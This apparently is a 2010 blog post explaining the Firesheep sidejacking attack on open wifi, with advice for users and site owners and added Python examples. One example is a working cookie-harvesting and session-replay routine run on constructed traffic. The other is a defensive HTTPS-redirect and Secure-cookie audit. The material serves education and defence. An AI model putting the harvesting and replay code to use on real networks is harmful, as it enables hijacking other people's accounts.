Monday, October 25, 2010

Firesheep - What you need to know.

So, what do you need to know about Firesheep?

What it does

Firesheep makes it trivial for any Firefox user ( Windows or Mac, Linux coming soon ) to do a "sidejacking" attack on the browser session of anyone on the same non-protected* wifi network the attacker is on. It works by sniffing the session cookie your browser sends, in plain unencrypted HTTP, on every page you load after logging in; it never needs your password. Facebook is one of the sites that is vulnerable ( and by far the biggest name in terms of actual usage ). So, if you're at a coffee shop and someone has Firesheep installed, and you log into Facebook on your laptop, they get a notification on their laptop that you've just logged in, with your profile picture. They click on it and !Bingo! their browser now carries your cookie, and they can instantly do whatever they want, as you, to your Facebook account. That's it in a nutshell.

The developer's post on it is here: http://codebutler.com/firesheep
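To make the mechanics concrete, here is an added example of the core of a sidejacker, written in Python for this page rather than taken from Firesheep ( which is a Firefox extension in JavaScript ). Firesheep reads real wifi frames; here the "capture" is a constructed list of plaintext HTTP requests so it runs offline, and the site handlers ( hostnames and cookie names ) are assumptions for illustration, not Firesheep's real handler list.

```python
"""Added example: the core of a sidejacker, in Python rather than the
JavaScript Firesheep is written in. Firesheep reads real wifi frames; here
the "capture" is a constructed list of plaintext HTTP requests so that it
runs offline. The site handlers (hostnames and cookie names) are assumptions
for illustration, not Firesheep's real handler list."""
from __future__ import annotations
from dataclasses import dataclass
from typing import Optional

# Per-site handler: which cookies together identify a logged-in session.
# Firesheep ships a small handler like this for each site it targets.
HANDLERS = {
    "www.example-social.test": {"session_id", "user_token"},
    "mail.example-mail.test": {"auth"},
}


@dataclass(frozen=True)
class Session:
    host: str
    cookies: tuple   # sorted (name, value) pairs of the identifying cookies


def parse_request(raw: bytes) -> Optional[tuple[str, dict[str, str]]]:
    """Return (host, {cookie name: value}) for one plaintext HTTP request,
    or None if it carries no Host or no Cookie header."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: dict[str, str] = {}
    for line in lines[1:]:               # lines[0] is the request line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    host = headers.get("host")
    if not host or "cookie" not in headers:
        return None
    cookies: dict[str, str] = {}
    for part in headers["cookie"].split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return host.lower(), cookies


def harvest(captured: list[bytes]) -> list[Session]:
    """Sidejacker core: a request whose Host has a handler and whose Cookie
    header carries every identifying cookie is a hijackable session.
    The same victim seen twice is reported once."""
    found: dict[tuple, Session] = {}
    for raw in captured:
        parsed = parse_request(raw)
        if parsed is None:
            continue
        host, cookies = parsed
        wanted = HANDLERS.get(host)
        if wanted and wanted <= set(cookies):
            ident = tuple(sorted((n, cookies[n]) for n in wanted))
            found[(host, ident)] = Session(host, ident)
    return list(found.values())


def replay_request(session: Session, path: str = "/") -> bytes:
    """The request the attacker sends to act as the victim. Only the stolen
    cookies are needed; the victim's password never enters into it."""
    cookie_hdr = "; ".join(f"{n}={v}" for n, v in session.cookies)
    return (f"GET {path} HTTP/1.1\r\nHost: {session.host}\r\n"
            f"Cookie: {cookie_hdr}\r\n\r\n").encode()


# Constructed "sniffed" traffic: two victims on the same open wifi, one
# cookie-less request, and the first victim seen a second time.
CAPTURED = [
    b"GET /home HTTP/1.1\r\nHost: www.example-social.test\r\n"
    b"Cookie: session_id=abc123; user_token=tok-9; lang=en\r\n\r\n",
    b"GET /static/logo.png HTTP/1.1\r\nHost: www.example-social.test\r\n\r\n",
    b"GET /inbox HTTP/1.1\r\nHost: mail.example-mail.test\r\n"
    b"Cookie: auth=deadbeef\r\n\r\n",
    b"GET /photos HTTP/1.1\r\nHost: www.example-social.test\r\n"
    b"Cookie: session_id=abc123; user_token=tok-9\r\n\r\n",
]

if __name__ == "__main__":
    for s in harvest(CAPTURED):
        print(f"{s.host}: {dict(s.cookies)}")
        print(replay_request(s, "/me").decode(), end="")
```

The point to notice is what is absent: no password, no cracking, nothing installed on the victim's machine. The only thing between the attacker and your account is whether that `Cookie:` line ever crosses the air in the clear.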

What sites are vulnerable?


The only notable exception is Google. Google has largely secured themselves from this vulnerability by locking up their services, Gmail in particular, with SSL from the login page all the way through. More on this in a second.

What do you mean by that "*" in the first part?

It's easier actually to define what I don't mean. WPA2 ( the "2" is important ) makes Firesheep's job a lot harder, but it is not a free pass. On a WPA2 network each laptop talks to the access point with its own session key, so a sniffer can't simply read everyone else's traffic the way it can on an open network. The catch is the shared password: on a WPA2 network with one passphrase for everybody ( WPA2-PSK, the kind written on the chalkboard ), anyone who knows that passphrase and captures your laptop joining the network can work out your session key and decrypt your traffic anyway. Only WPA2-Enterprise, where every user logs in with their own credentials, gives each client a key the others cannot derive. WPA has the same shared-password problem, WEP uses a single key for everybody and is easily cracked, and open networks ( and whatever other kind you might have ) don't encrypt at all. So WPA2 protects clients from other clients only as far as the password is actually secret.

So, for example, there are 3 coffeehouses within a 3-minute drive of my house. One has a WPA2 network. The other two don't. Guess where I'm getting a latte?

So, as a user, if you're on WPA2 with your own login, or with a passphrase that isn't handed to every customer, good to go. If the WPA2 password is on the chalkboard, treat it like an open network and read on.

What if I'm not on a WPA2 network?

Well, then you need to be careful. What do I mean by "careful"? Use Firefox with the HTTPS Everywhere add-on, which forces the sites it has rules for onto https:// so the session cookie never goes out in the clear. Or route everything through Tor. Or if you have the means, a VPN. One caveat: Tor and a VPN only encrypt the hop the coffee-shop sniffer can see; your traffic comes back out as plain HTTP at the Tor exit or the VPN server, so they move the problem rather than remove it. More about some options here: http://news.cnet.com/8301-27080_3-20008217-245.html

Is this a lot of technical mumbo jumbo? Yes. Do you want a 15-yr-old hoodlum posting bestiality pictures on your profile the next time you want to surf over a mocha? Probably not.

At the end of the day, though, these are all just throwing a carpet patch over a wine stain in terms of the real behind-the-scenes problem. The only way to actually eliminate the risk is for the site to serve all of its traffic over SSL and to mark its session cookie so the browser will never send it over plain http. Up till now the industry standard for when this was necessary was "If e-commerce is involved". That may be a thing of the past. More for site owners farther down the page.

Is someone doing "something™" about it?

Well. Perhaps. As I said, Google already did. I don't run Facebook. Maybe you could email Mark Zuckerberg? I hear he's pretty busy these days. Basically we all just have to wait & see.

SSL is in truth not all that expensive. And if enough users make enough noise, yes "they" probably will do "something" about it.

I have a website. Can people use this to break into it?

Many of our client sites have administrative panels to manage their site's content. Firesheep only notices the sites it ships a handler for, and a custom admin panel isn't on that list, so out of the box it won't catch you. But the technique works against any site that sends its login cookie over plain http, and a handler for a new site is only a few lines; someone on the same wifi who wanted into your panel specifically could write one. Two things that do not help here: a strong password ( the attacker never sees or needs it, only the cookie your browser sends after you've typed it ) and anti-virus software ( nothing is installed on your machine ). What does help is the same advice as for Facebook: don't log into the panel from an open network, use HTTPS Everywhere ( it won't know your site, but it won't hurt ), and, best of all, put the admin panel itself on SSL. More on that next.

So what REALLY "fixes" it on my web site?

As mentioned before, it really is up to the site owner and administrator to provide the real fix for it. That fix is: *trumpets* S S L.

SSL ( Secure Sockets Layer, the thing behind the padlock in your browser ) changes the address of your website from http://mysite to https://mysite. It also encrypts all traffic between your site and the end user so that no one in the middle ( ex: Firesheep users at the coffee shop ) can decipher the conversation. Two details matter for Firesheep specifically. First, the whole site has to be on https, not just the login page: a login over https followed by ordinary http pages still sends the cookie in the clear on every one of them, which is exactly the case Firesheep was built for. Second, the session cookie has to be set with the Secure flag, so the browser refuses to send it over http at all, even if someone links your user to http://mysite.
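Here is what that looks like on the server side, as an added example ( not code from this site or from any particular framework ): a redirect that bounces plain http requests to https, a Set-Cookie line for the login session with the Secure and HttpOnly flags, and a small audit that flags Set-Cookie headers a sidejacker could still catch. The cookie name, hostnames and lifetime are assumptions for illustration.

```python
"""Added example (not from the original post): the server-side fix.
Beyond buying a certificate there are two pieces: (1) bounce plain-HTTP
requests to https://, and (2) mark the session cookie Secure so the
browser never sends it over http:// again, which is exactly what the
sniffer is waiting for. audit_set_cookie() checks existing headers.
The cookie name and lifetime are assumptions for illustration."""
from __future__ import annotations
from http.cookies import SimpleCookie
from typing import Optional
from urllib.parse import urlunsplit

SESSION_COOKIE = "session_id"   # assumed name of the site's login cookie


def https_redirect(scheme: str, host: str, path: str) -> Optional[tuple[int, dict]]:
    """Return (301, headers) sending an http:// request to the same URL on
    https://, or None when the request already arrived over TLS."""
    if scheme == "https":
        return None
    return 301, {"Location": urlunsplit(("https", host, path, "", ""))}


def session_cookie_header(value: str, max_age: int = 3600) -> str:
    """Set-Cookie value for the login session. Secure keeps it off plain
    HTTP (the Firesheep fix); HttpOnly keeps it away from page scripts."""
    c = SimpleCookie()
    c[SESSION_COOKIE] = value
    c[SESSION_COOKIE]["secure"] = True
    c[SESSION_COOKIE]["httponly"] = True
    c[SESSION_COOKIE]["path"] = "/"
    c[SESSION_COOKIE]["max-age"] = max_age
    return c.output(header="").strip()


def audit_set_cookie(headers: list[str]) -> list[str]:
    """Names of cookies in the given Set-Cookie header values that a
    sidejacker could still catch because they lack the Secure flag."""
    exposed = []
    for h in headers:
        c = SimpleCookie()
        c.load(h)
        for name, morsel in c.items():
            if not morsel["secure"]:
                exposed.append(name)
    return exposed


if __name__ == "__main__":
    print(https_redirect("http", "mysite", "/admin"))
    print(session_cookie_header("abc123"))
    # Constructed headers: the first and third are what most sites set in 2010.
    print(audit_set_cookie(["session_id=abc123; Path=/",
                            "lang=en; Secure",
                            "auth=x; HttpOnly"]))
```

Note what the redirect alone does not fix: the user's very first request to http://mysite, cookie included, is already on the air before the 301 comes back. That is why the Secure flag is not optional; with it set, the browser sends nothing sensitive on that first hop, and the redirect just gets the user to the encrypted site.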

Honestly, SSL is peace of mind, and it's fairly inexpensive peace of mind. You'll spend less on it than you do on a couple months of car insurance. We can recommend that you do this, but it's really up to you.
